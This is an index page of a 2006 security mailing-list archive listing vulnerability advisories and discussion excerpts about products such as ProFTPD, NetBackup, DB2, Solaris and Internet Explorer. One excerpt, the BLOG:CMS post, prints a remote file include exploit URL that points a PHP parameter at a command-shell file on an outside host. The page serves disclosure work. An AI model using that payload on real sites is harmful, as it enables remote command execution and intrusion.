|
|
Colapse all |
Post message
rPSA-2006-0232-1 libgsf 2006-12-14 rPath Update Announcements (announce-noreply rpath com) rPath Security Advisory: 2006-0232-1 Published: 2006-12-14 Products: rPath Linux 1 Rating: Minor Exposure Level Classification: Indirect User Deterministic Unauthorized Access Updated Versions: libgsf=/conary.rpath.com@rpl:devel//1/1.12.0-4.2-1 References: http://www.cve.mitre.org/cgi-b [ more ] [ reply ] HyperAccess - Multiple Vulnerabilities 2006-12-14 Brett Moore (brett moore security-assessment com) Not long now... ======================================================================== = Hyper Access - Multiple Vulnerabilities = = Vendor Website: = http://www.hilgraeve.com = = Affected Software: = Hyper Access 8.4 (and possibly lower) = = Public disclosure on Thursday December 14, 200 [ more ] [ reply ] GenesisTrader v1.0 - Multiple Vulnerabilities 2006-12-14 mr_kaliman msn com GenesisTrader v1.0 ------------------ Vendor site: http://www.genesis-php.com/ Product: GenesisTrader v1.0 Vulnerability: Source Code Disclosure, Arbitrary File Upload & XSS Credits: Mr_KaLiMaN Reported to Vendor: 06/12/06 Public disclosure: 14/12/06 Description: ------------ Source Code Disclosu [ more ] [ reply ] Re: [fuzzing] NOT a 0day! Re: [Full-disclosure] OWASP Fuzzing page 2006-12-14 Jerome Athias (jerome athias free fr) Gadi Evron a écrit : > On Tue, 12 Dec 2006, Joxean Koret wrote: > >> Wow! That's fun! The so called "Word 0 day" flaw also affects >> OpenOffice.org! At least, 1.1.3. And, oh! Abiword does something cool >> with the file: >> > > This is NOT a 0day. It is a disclosed vulnerability in full-dis [ more ] [ reply ] [ GLSA 200612-16 ] Links: Arbitrary Samba command execution 2006-12-14 Raphael Marichez (falco gentoo org) The (in)security of Xorg and DRI 2006-12-14 Darren Reed (avalon caligula anu edu au) In recent discussion, the topic of the Xorg server being a huge security vulnerability because of its DRI model has come up. The problem being that you have user space code communicating with chips in the system and being able to control DMA and what goes which way on the system bus... Does anyon [ more ] [ reply ] [ GLSA 200612-15 ] McAfee VirusScan: Insecure DT_RPATH 2006-12-14 Sune Kloppenborg Jeppesen (jaervosz gentoo org) Re: The newest Word flaw is due to malformed data structure handling 2006-12-14 Steven M. Christey (coley mitre org) Alexander Sotirov said: >Descriptions of vulnerabilities, especially ones that are found in the >wild, should include enough information to allow researchers to >uniquely identify the new vulnerability and differentiate it from all >other bugs, both known ones and 0days. I say this periodically, [ more ] [ reply ] CORE-2006-1127: ProFTPD Controls Buffer Overflow 2006-12-13 CORE Security Technologies Advisories (advisories coresecurity com) ZDI-06-050: Symantec Veritas NetBackup CONNECT_OPTIONS Buffer Overflow Vulnerability 2006-12-13 zdi-disclosures 3com com ZDI-06-050: Symantec Veritas NetBackup CONNECT_OPTIONS Buffer Overflow Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-06-050.html December 13, 2006 -- CVE ID: CVE-2006-5822 -- Affected Vendor: Symantec -- Affected Products: Veritas NetBackup 6.0 < MP4 Veritas NetBackup [ more ] [ reply ] ZDI-06-049: Symantec Veritas NetBackup Long Request Buffer Overflow Vulnerability 2006-12-13 zdi-disclosures 3com com ZDI-06-049: Symantec Veritas NetBackup Long Request Buffer Overflow Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-06-049.html December 13, 2006 -- CVE ID: CVE-2006-6222 -- Affected Vendor: Symantec -- Affected Products: Veritas NetBackup 6.0 < MP4 Veritas NetBackup 5.1 [ more ] [ reply ] IBM DB2 Remote DoS during CONNECT processing 2006-12-13 Team SHATTER (shatter appsecinc com) -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 IBM DB2 Remote DoS during CONNECT processing AppSecInc Team SHATTER Security Advisory: http://www.appsecinc.com/resources/alerts/db2/2006-09-05.shtml Affected versions: All versions of IBM DB2 Database Server Risk level: Medium Credits: This vulnera [ more ] [ reply ] [SECURITY] [DSA-1236-1] New enemies-of-carlotta package fix missing sanity checks 2006-12-13 Steve Kemp (skx debian org) [SECURITY] [DSA-1235-1] New ruby1.8 package fix denial of service 2006-12-13 Steve Kemp (skx debian org) [SECURITY] [DSA-1234-1] New ruby1.6 package fix denial of service 2006-12-13 Steve Kemp (skx debian org) Re: worksystem => Remote File Include Vulnerability Exploit 2006-12-13 Laurent van_den_reysen tiscali fr ASP Cmd Shell On IIS 5.1 2006-12-13 Brett Moore (brett moore security-assessment com) ======================================================================== ==== % ASP Cmd Shell On IIS 5.1 % brett.moore (at) security-assessment (dot) com [email concealed] ======================================================================== ==== ASP shells have been around since the dawn of time. On IIS 5.0 and prior it wa [ more ] [ reply ] iDefense Security Advisory 12.12.06: Sun Microsystems Solaris ld.so Directory Traversal Vulnerability 2006-12-12 iDefense Labs (labs-no-reply idefense com) Sun Microsystems Solaris ld.so Directory Traversal Vulnerability iDefense Security Advisory 12.12.06 http://labs.idefense.com/intelligence/vulnerabilities/ Dec 12, 2006 I. BACKGROUND Solaris is a UNIX operating system developed by Sun Microsystems. More information can be found at http://www.sun [ more ] [ reply ] [ GLSA 200612-14 ] Trac: Cross-site request forgery 2006-12-12 Sune Kloppenborg Jeppesen (jaervosz gentoo org) iDefense Security Advisory 12.12.06: Sun Microsystems Solaris ld.so 'doprf()' Buffer Overflow Vulnerability 2006-12-12 iDefense Labs (labs-no-reply idefense com) Sun Microsystems Solaris ld.so 'doprf()' Buffer Overflow Vulnerability iDefense Security Advisory 12.12.06 http://labs.idefense.com/intelligence/vulnerabilities/ Dec 12, 2006 I. BACKGROUND Solaris is a UNIX operating system developed by Sun Microsystems. More information can be found at http://w [ more ] [ reply ] [ GLSA 200612-13 ] libgsf: Buffer overflow 2006-12-12 Sune Kloppenborg Jeppesen (jaervosz gentoo org) [ GLSA 200612-12 ] F-PROT Antivirus: Multiple vulnerabilities 2006-12-12 Sune Kloppenborg Jeppesen (jaervosz gentoo org) ZDI-06-046: Sophos Anti-Virus SIT Archive Parsing Buffer Overflow Vulnerability 2006-12-12 zdi-disclosures 3com com ZDI-06-046: Sophos Anti-Virus SIT Archive Parsing Buffer Overflow Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-06-046.html December 12, 2006 -- CVE ID: CVE-2006-6335 -- Affected Vendor: Sophos -- Affected Products: All versions of Sophos Anti-Virus < v2.40 scanning en [ more ] [ reply ] ZDI-06-048: Microsoft Internet Explorer normalize() Function Memory Corruption Vulnerability 2006-12-12 zdi-disclosures 3com com ZDI-06-048: Microsoft Internet Explorer normalize() Function Memory Corruption Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-06-048.html December 12, 2006 -- CVE ID: CVE-2006-5581 -- Affected Vendor: Microsoft -- Affected Products: Internet Explorer 6 -- TippingPoint( [ more ] [ reply ] Secunia Research: Internet Explorer Script Error Handling MemoryCorruption 2006-12-12 Secunia Research (remove-vuln secunia com) BLOG:CMS Remote file include Vulnerability 2006-12-10 security soqor net Hello BLOG:CMS Remote file include Vulnerability Discovered By : HACKERS PAL Copy rights : HACKERS PAL Website : http://www.soqor.net Email Address : security (at) soqor (dot) net [email concealed] admin/PLUGINs/NP_UserSharing.php?DIR_ADMIN=http://www.soqor.net/tools/cm d.txt?admin #WwW.SoQoR.NeT [ more ] [ reply ] |
|
Privacy Statement |
Ubuntu Security Notice USN-380-2 December 14, 2006
avahi regression
https://launchpad.net/bugs/72728
===========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 5.10
[ more ] [ reply ]